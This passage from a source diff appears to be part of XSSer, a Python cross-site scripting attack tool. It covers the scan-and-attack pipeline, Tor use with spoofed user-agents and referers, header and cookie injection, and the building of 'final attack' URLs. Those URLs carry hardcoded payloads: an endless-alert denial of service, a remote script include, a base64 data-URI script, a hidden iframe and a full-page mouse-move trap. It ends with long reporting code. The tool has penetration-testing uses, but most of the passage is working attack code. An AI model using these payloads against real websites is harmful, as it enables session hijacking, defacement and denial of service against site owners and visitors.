+            self.check_trace()
+
+        if options.checktor:
+            url = self.check_tor_url # TOR status checking site
+            print '='*75
+            print ""
+            print "        _                         "
+            print "       /_/_      .'''.            "
+            print "    =O(_)))) ...'     `.          "
+            print "       \_\              `.    .'''"
+            print "                          `..'    " 
+            print ""
+            print '='*75
+            agents = [] # user-agents
+            try:
+                f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
+            except:
+                f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
+            for line in f:
+                agents.append(line)
+            agent = random.choice(agents).strip() # set random user-agent
+            referer = "127.0.0.1"
+            print "\nSending request to: " + url + "\n"
+            print "-"*25+"\n"
+            headers = {'User-Agent' : agent, 'Referer' : referer} # set fake user-agent and referer
+            try:
+                import urllib2
+                req = urllib2.Request(url, None, headers)
+                tor_reply = urllib2.urlopen(req).read()
+                your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip() # extract public IP
+                if not tor_reply or 'Congratulations' not in tor_reply:
+                    print("It seems that Tor is not properly set.\n")
+                    print("IP address appears to be: " + your_ip + "\n")
+                else:
+                    print("Congratulations!. Tor is properly being used :-)\n")
+                    print("IP address appears to be: " + your_ip + "\n")
+            except:
+                print("[Error] Cannot reach TOR checker system!. Are you connected?\n")
+                sys.exit(2) # return
+
+        nthreads = max(1, abs(options.threads))
+        nworkers = len(self.pool.workers)
+        if nthreads != nworkers:
+            if nthreads < nworkers:
+                self.pool.dismissWorkers(nworkers-nthreads)
+            else:
+                self.pool.createWorkers(nthreads-nworkers)
+
+        for reporter in self._reporters:
+            reporter.report_state('scanning')
+        
+        # step 1: get urls
+        urls = self.try_running(self._get_attack_urls, "\n[Error] Internal error getting -targets-\n")
+        for reporter in self._reporters:
+            reporter.report_state('arming')
+        
+        # step 2: get payloads
+        payloads = self.try_running(self.get_payloads, "\n[Error] Internal error getting -payloads-\n")
+        for reporter in self._reporters:
+            reporter.report_state('cloaking')
+        if options.Dwo:
+            payloads = self.process_payloads_ipfuzzing(payloads)
+        elif options.Doo:
+            payloads = self.process_payloads_ipfuzzing_octal(payloads)
+        for reporter in self._reporters:
+            reporter.report_state('locking targets')
+
+        # step 3: get query string
+        query_string = self.try_running(self.get_query_string, "\n[Error] Internal problems getting query -string-\n")
+        for reporter in self._reporters:
+            reporter.report_state('sanitize')
+        urls = self.sanitize_urls(urls)
+        for reporter in self._reporters:
+            reporter.report_state('attack')
+
+        # step 4: perform attack
+        self.try_running(self.attack, "\n[Error] Internal problems running attack...\n", (urls, payloads, query_string))
+        for reporter in self._reporters:
+            reporter.report_state('reporting')
+        if len(self.final_attacks):
+            self.report("[Info] Waiting for tokens to arrive...")
+        while self._ongoing_requests and not self._landing:
+            if not self.pool:
+                self.mothership.poll_workers()
+            else:
+                self.poll_workers()
+            time.sleep(0.2)
+            for reporter in self._reporters:
+                reporter.report_state('final sweep...')
+        if self.pool:
+            self.pool.dismissWorkers(len(self.pool.workers))
+            self.pool.joinAllDismissedWorkers()
+        start = time.time()
+        while not self._landing and len(self.final_attacks) and time.time() - start < 5.0:
+            time.sleep(0.2)
+            for reporter in self._reporters:
+                reporter.report_state('landing... '+str(int(5.0 - (time.time() - start))))
+        if self.final_attacks:
+            self.report("-"*25+"\n")
+            self.report("[Info] Generating 'token' url:\n")
+            for final_attack in self.final_attacks.itervalues():
+                if not final_attack['url'] == None:
+                    self.report(final_attack['url'] , "\n")
+                self.report("="*50+"\n")
+                self.report("[Info] CONGRATULATIONS!!! <-> This vector is doing a remote connection... So, is: 100% VULNERABLE! ;-)\n")
+                self.report(",".join(self.successful_urls), "\n")
+                self.report("="*50 + "\n")
+        for reporter in self._reporters:
+            reporter.end_attack()
+        self.report("="*50)
+        if self.mothership:
+            self.mothership.remove_reporter(self)
+            self.report("Mosquito(es) landed!")
+        else:
+            self.report("Mosquito(es) landed!")
+        self.report("="*50)
+        self.print_results()
+
+    def sanitize_urls(self, urls):
+        all_urls = set()
+        if urls is not None:
+            for url in urls:
+                if url.startswith("http://") or url.startswith("https://"):
+                    self.urlspoll.append(url)
+                    all_urls.add(url)
+                else:
+                    if self.options.crawling:
+                        self.report("[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
+                    else:
+                        self.report("\n[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
+                    url = None
+        else:
+            self.report("\n[Error] Not any valid source provided to start a test... Aborting!\n")
+        return all_urls
+
+    def land(self, join=False):
+        self._landing = True
+        if self.hub:
+            self.hub.shutdown()
+            if join:
+                self.hub.join()
+                self.hub = None
+
+    def _prepare_extra_attacks(self, payload):
+        """
+        Setup extra attacks.
+        """
+        options = self.options
+        agents = [] # user-agents
+        try:
+            f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
+        except:
+            f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
+        for line in f:
+            agents.append(line)
+        extra_agent = random.choice(agents).strip() # set random user-agent
+        extra_referer = "127.0.0.1"
+        extra_cookie = None
+        if self.options.script:
+            if 'XSS' in payload['payload']:
+                payload['payload'] = payload['payload'].replace("XSS","PAYLOAD")
+        if 'PAYLOAD' in payload['payload'] or 'XSS' in payload['payload']:
+            if options.xsa:
+                hashing = self.generate_hash('xsa')
+                agent = payload['payload'].replace('PAYLOAD', hashing)
+                self._ongoing_attacks['xsa'] = hashing
+                self.xsa_injection = self.xsa_injection + 1
+                self.options.agent = agent
+                extra_agent = agent
+                self.extra_hashed_injections[hashing] = "XSA", payload['payload']
+            if options.xsr:
+                hashing = self.generate_hash('xsr')
+                referer = payload['payload'].replace('PAYLOAD', hashing)
+                self._ongoing_attacks['xsr'] = hashing
+                self.xsr_injection = self.xsr_injection + 1
+                self.options.referer = referer
+                extra_referer = referer
+                self.extra_hashed_injections[hashing] = "XSR", payload['payload']
+            if options.coo:
+                hashing = self.generate_hash('cookie')
+                cookie = payload['payload'].replace('PAYLOAD', hashing)
+                self._ongoing_attacks['coo'] = hashing
+                self.coo_injection = self.coo_injection + 1
+                self.options.cookie = cookie
+                extra_cookie = cookie
+                self.extra_hashed_injections[hashing] = "COO", payload['payload']
+        return extra_agent, extra_referer, extra_cookie
+
+    def attack(self, urls, payloads, query_string):
+        """
+        Perform an attack on the given urls with the provided payloads and
+        query_string.
+        """
+        for url in urls:
+            if self.pool:
+                self.poll_workers()
+            else:
+                self.mothership.poll_workers()
+            if not self._landing:
+                self.attack_url(url, payloads, query_string)
+
+    def generate_real_attack_url(self, dest_url, description, method, hashing, query_string, payload, orig_url):
+        """
+        Generate a real attack url by using data from a successful test.
+
+	    This method also applies DOM stealth mechanisms.
+        """
+        user_attack_payload = payload['payload']
+        if self.options.finalpayload:
+            user_attack_payload = self.options.finalpayload
+        elif self.options.finalremote:
+            user_attack_payload = '<script src="' + self.options.finalremote + '"></script>'
+        elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Data Control Protocol Injection]":
+            user_attack_payload = '<a href="data:text/html;base64,' + b64encode(self.options.finalpayload) + '></a>'
+        elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Induced Injection]":
+            user_attack_payload = self.options.finalpayload
+        if self.options.dos:
+            user_attack_payload = '<script>for(;;)alert("You were XSSed!!");</script>'
+        if self.options.doss:
+            user_attack_payload = '<meta%20http-equiv="refresh"%20content="0;">'
+        if self.options.b64:
+            user_attack_payload = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4">'
+        if self.options.onm:
+            user_attack_payload = '"style="position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px" onMouseMove="' + user_attack_payload
+        if self.options.ifr:
+            user_attack_payload = '<iframe src="' + user_attack_payload + '" width="0" height="0"></iframe>'
+        do_anchor_payload = self.options.anchor
+        anchor_data = None
+        attack_hash = None
+        if do_anchor_payload: # DOM Shadows!
+            dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
+            dest_url = dest_url.replace('?', '#')
+        else:
+            dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
+        if attack_hash:
+            self.final_attacks[attack_hash] = {'url':dest_url}
+        return dest_url
+
+    def token_arrived(self, attack_hash):
+        if not self.mothership:
+            # only the mothership calls on token arriving.
+            self.final_attack_callback(attack_hash)
+
+    def final_attack_callback(self, attack_hash):
+        if attack_hash in self.final_attacks:
+            dest_url = self.final_attacks[attack_hash]['url']
+            self.report('[*] Browser check:', dest_url)
+            for reporter in self._reporters:
+                reporter.add_checked(dest_url)
+            if self._reporter:
+                from twisted.internet import reactor
+                reactor.callFromThread(self._reporter.post, 'SUCCESS ' + dest_url)
+            self.final_attacks.pop(attack_hash)
+
+    def apply_postprocessing(self, dest_url, description, method, hashing, query_string, payload, orig_url):
+        real_attack_url = self.generate_real_attack_url(dest_url, description, method, hashing, query_string, payload, orig_url)
+        #generate_shorturls = self.options.shorturls
+        #if generate_shorturls:
+        #    shortener = ShortURLReservations(self.options.shorturls)
+        #    if self.options.finalpayload or self.options.finalremote or self.options.b64 or self.options.dos:
+        #        shorturl = shortener.process_url(real_attack_url)
+        #        self.report("[/] Shortered URL (Final Attack):", shorturl)
+        #    else:
+        #        shorturl = shortener.process_url(dest_url)
+        #        self.report("[/] Shortered URL (Injection):", shorturl)
+        return real_attack_url
+
+    def report(self, *args):
+        args = list(map(lambda s: str(s), args))
+        formatted = " ".join(args)
+        if not self.options.silent:
+            print(formatted)
+        for reporter in self._reporters:
+            reporter.post(formatted)
+
+    def print_results(self):
+        """
+        Print results from attack.
+        """
+        self.report('\n' + '='*75)
+        total_injections = len(self.hash_found) + len(self.hash_notfound)
+        if len(self.hash_found) + len(self.hash_notfound) == 0:
+            pass
+        elif self.options.heuristic: 
+            pass
+        else:
+            self.report("[*] Final Results:")
+            self.report('='*75 + '\n')
+            self.report("- Injections:", total_injections)
+            self.report("- Failed:", len(self.hash_notfound))
+            self.report("- Successful:", len(self.hash_found))
+            try:
+                _accur = len(self.hash_found) * 100 / total_injections
+            except ZeroDivisionError:
+                _accur = 0
+            self.report("- Accur: %s %%\n" % _accur)
+            if not len(self.hash_found) and self.hash_notfound:
+                self.report('='*75 + '\n')
+                pass
+            else:
+                self.report('='*75)
+                self.report("[*] List of XSS injections:")
+                self.report('='*75 + '\n')
+                if self.options.reversecheck:
+                    self.report("You have found: [ " + str(len(self.hash_found)) + " ] XSS vector(s)! -> [100% VULNERABLE]\n")
+                else:
+                    self.report("You have found: [ " + str(len(self.hash_found)) + " ] possible (without --reverse-check) XSS vector(s)!\n")
+                self.report("---------------------" + "\n")
+        if self.options.fileoutput:
+            fout = open("XSSreport.raw", "w") # write better than append
+        for line in self.hash_found:
+            if self.options.heuristic or self.options.hash: # not final attack possible when checking
+                pass
+            else:
+                attack_url = self.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
+            if line[2] == "XSR":
+                self.xsr_found = self.xsr_found + 1
+                if len(self.hash_found) < 11:
+                    if line[4]: # when query string
+                        self.report("[+] Target:", line[6] + " | " + line[4])
+                    else:
+                        self.report("[+] Target:", line[6])
+                    self.report("[+] Vector: [ " + str(line[2]) + " ]")
+                    self.report("[!] Method: Referer Injection")
+                    self.report("[*] Hash:", line[3])
+                    self.report("[*] Payload:", str(Curl.referer))
+                    self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
+                if self.options.fileoutput:
+                    fout.write("="*75)
+                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
+                    fout.write("="*75 + "\n\n")
+                    for h in self.hash_found:
+                        if h[2] == "XSR":
+                            if h[4]:
+                                fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
+                            else:
+                                fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
+                        fout.write("="*75 + "\n\n")
+            elif line[2] == "XSA":
+                self.xsa_found = self.xsa_found + 1
+                if len(self.hash_found) < 11:
+                    if line[4]: # when query string
+                        self.report("[+] Target:", line[6] + " | " + line[4])
+                    else:
+                        self.report("[+] Target:", line[6])
+                    self.report("[+] Vector: [ " + str(line[2]) + " ]")
+                    self.report("[!] Method: User-Agent Injection")
+                    self.report("[*] Hash:", line[3])
+                    self.report("[*] Payload:", str(Curl.agent))
+                    self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
+                if self.options.fileoutput:
+                    fout.write("="*75)
+                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
+                    fout.write("="*75 + "\n\n")
+                    for h in self.hash_found:
+                        if h[2] == "XSA":
+                            if h[4]:
+                                fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
+                            else:
+                                fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
+                        fout.write("="*75 + "\n\n")
+            elif line[2] == "COO":
+                self.coo_found = self.coo_found + 1
+                if len(self.hash_found) < 11:
+                    if line[4]: # when query string
+                        self.report("[+] Target:", line[6] + " | " + line[4])
+                    else:
+                        self.report("[+] Target:", line[6])
+                    self.report("[+] Vector: [ " + str(line[2]) + " ]")
+                    self.report("[!] Method: Cookie Injection")
+                    self.report("[*] Hash:", line[3])
+                    self.report("[*] Payload:", str(Curl.cookie))
+                    self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
+                if self.options.fileoutput:
+                    fout.write("="*75)
+                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
+                    fout.write("="*75 + "\n\n")
+                    for h in self.hash_found:
+                        if h[2] == "COO":
+                            if h[4]:
+                                fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
+                            else:
+                                fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
+                        fout.write("="*75 + "\n\n")
+            elif line[1] == "[Data Control Protocol Injection]":
+                self.dcp_found = self.dcp_found + 1
+                if len(self.hash_found) < 11:
+                    if line[4]: # when query string
+                        self.report("[+] Target:", line[6] + " | " + line[4])
+                    else:
+                        self.report("[+] Target:", line[6])
+                    self.report("[+] Vector: [ " + str(line[2]) + " ]")
+                    self.report("[!] Method: DCP")
+                    self.report("[*] Hash:", line[3])
+                    self.report("[*] Payload:", line[0])
+                    self.report("[!] Vulnerable: DCP (Data Control Protocol)")
+                    if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                        self.report("[*] Final Attack:", attack_url)
+                    self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
+                if self.options.fileoutput:
+                    fout.write("="*75)
+                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
+                    fout.write("="*75 + "\n\n")
+                    for h in self.hash_found:
+                        if h[4]:
+                            if h[1] == "[Data Control Protocol Injection]":
+                                if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                                    fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
+                                else:
+                                    fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
+                            else:
+                                if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                                    fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
+                                else:
+                                    fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
+                        fout.write("="*75 + "\n\n")
+            elif line[1] == "[Document Object Model Injection]":
+                self.dom_found = self.dom_found + 1 
+                if len(self.hash_found) < 11:
+                    if line[4]: # when query string
+                        self.report("[+] Target:", line[6] + " | " + line[4])
+                    else:
+                        self.report("[+] Target:", line[6])
+                    self.report("[+] Vector: [ " + str(line[2]) + " ]")
+                    self.report("[!] Method: DOM")
+                    self.report("[*] Hash:", line[3])
+                    self.report("[*] Payload:", line[0])
+                    self.report("[!] Vulnerable: DOM (Document Object Model)")
+                    if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                        self.report("[*] Final Attack:", attack_url)
+                    self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
+                if self.options.fileoutput:
+                    fout.write("="*75)
+                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
+                    fout.write("="*75 + "\n\n")
+                    for h in self.hash_found:
+                        if h[1] == "[Document Object Model Injection]":
+                            if h[4]:
+                                if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                                    fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
+                                else:
+                                    fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
+                            else:
+                                if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                                    fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
+                                else:
+                                    fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
+                            fout.write("="*75 + "\n\n")
+            elif line[1] == "[Induced Injection]":
+                self.httpsr_found = self.httpsr_found +1
+                if len(self.hash_found) < 11:
+                    if line[4]: # when query string
+                        self.report("[+] Target:", line[6] + " | " + line[4])
+                    else:
+                        self.report("[+] Target:", line[6])
+                    self.report("[+] Vector: [ " + str(line[2]) + " ]")
+                    self.report("[!] Method: INDUCED")
+                    self.report("[*] Hash:", line[3])
+                    self.report("[*] Payload:", line[0])
+                    self.report("[!] Vulnerable: HTTPsr ( HTTP Splitting Response)")
+                    if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                        self.report("[*] Final Attack:", attack_url)
+                    self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
+                if self.options.fileoutput:
+                    fout.write("="*75)
+                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
+                    fout.write("="*75 + "\n\n")
+                    for h in self.hash_found:
+                        if h[4]:
+                            if h[1] == "[Induced Injection]":
+                                if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                                    fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
+                                else:
+                                    fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
+                            else:
+                                if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                                    fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
+                                else:
+                                    fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
+                            fout.write("="*75 + "\n\n")
+            elif line[1] == "[hashing check]":
+                if len(self.hash_found) < 11:
+                    if line[4]:
+                        self.report("[+] Target:", line[6] + " | " + line[4])
+                    else:
+                        self.report("[+] Target:", line[6])
+                    self.report("[+] Vector: [ " + str(line[3]) + " ]")
+                    self.report("[!] Method:", line[2])
+                    self.report("[*] Payload:", line[5])
+                    self.report("[!] Status: HASH FOUND!",  "\n", '-'*50, "\n")
+                if self.options.fileoutput:
+                    fout.write("="*75)
+                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
+                    fout.write("="*75 + "\n\n")
+                    for h in self.hash_found:
+                        if h[1] == "[hashing check]":
+                            if h[4]:
+                                fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
+                            else:
+                                fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
+                            fout.write("="*75 + "\n\n")
+            elif line[1] == "[manual_injection]":
+                self.manual_found = self.manual_found + 1
+                if len(self.hash_found) < 11:
+                    if line[4]: # when query string
+                        self.report("[+] Target:", line[6] + " | " + line[4])
+                    else:
+                        self.report("[+] Target:", line[6])
+                    self.report("[+] Vector: [ " + str(line[2]) + " ]")
+                    self.report("[!] Method: MANUAL")
+                    self.report("[*] Hash:", line[3])
+                    self.report("[*] Payload:", line[0])
+                    if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                        self.report("[*] Final Attack:", attack_url)
+                    self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
+                if self.options.fileoutput:
+                    fout.write("="*75)
+                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
+                    fout.write("="*75 + "\n\n")
+                    for line in self.hash_found:
+                        if line[4]:
+                            if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                                fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
+                            else:
+                                fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
+                        else:
+                            if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                                fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
+                            else:
+                                fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
+                        fout.write("="*75 + "\n\n")
+            elif line[1] == "[Heuristic test]":
+                if len(self.hash_found) < 11:
+                    if line[4]: 
+                        self.report("[+] Target:", line[6] + " | " + line[4])
+                    else:
+                        self.report("[+] Target:", line[6])
+                    self.report("[+] Vector: [ " + str(line[3]) + " ]")
+                    self.report("[!] Method:", line[2])
+                    self.report("[*] Payload:", line[5])
+                    self.report("[!] Status: NOT FILTERED!",  "\n", '-'*50, "\n")
+                if self.options.fileoutput:
+                    fout.write("="*75)
+                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
+                    fout.write("="*75 + "\n\n")
+                    for line in self.hash_found:
+                        if line[4]:
+                            fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
+                        else:
+                            fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
+                        fout.write("="*75 + "\n\n")
+            else:
+                self.auto_found = self.auto_found + 1
+                if len(self.hash_found) < 11:
+                    if line[4]: # when query string
+                        self.report("[+] Target:", line[6] + " | " + line[4])
+                    else:
+                        self.report("[+] Target:", line[6])
+                    self.report("[+] Vector: [ " + str(line[2]) + " ]")
+                    self.report("[!] Method: URL")
+                    self.report("[*] Hash:", line[3])
+                    self.report("[*] Payload:", line[0])
+                    self.report("[!] Vulnerable:", line[1])
+                    if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                        self.report("[*] Final Attack:", attack_url)
+                    self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
+                if self.options.fileoutput:
+                    fout.write("="*75)
+                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
+                    fout.write("="*75 + "\n\n")
+                    for line in self.hash_found:
+                        if line[4]:
+                            if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                                fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
+                            else:
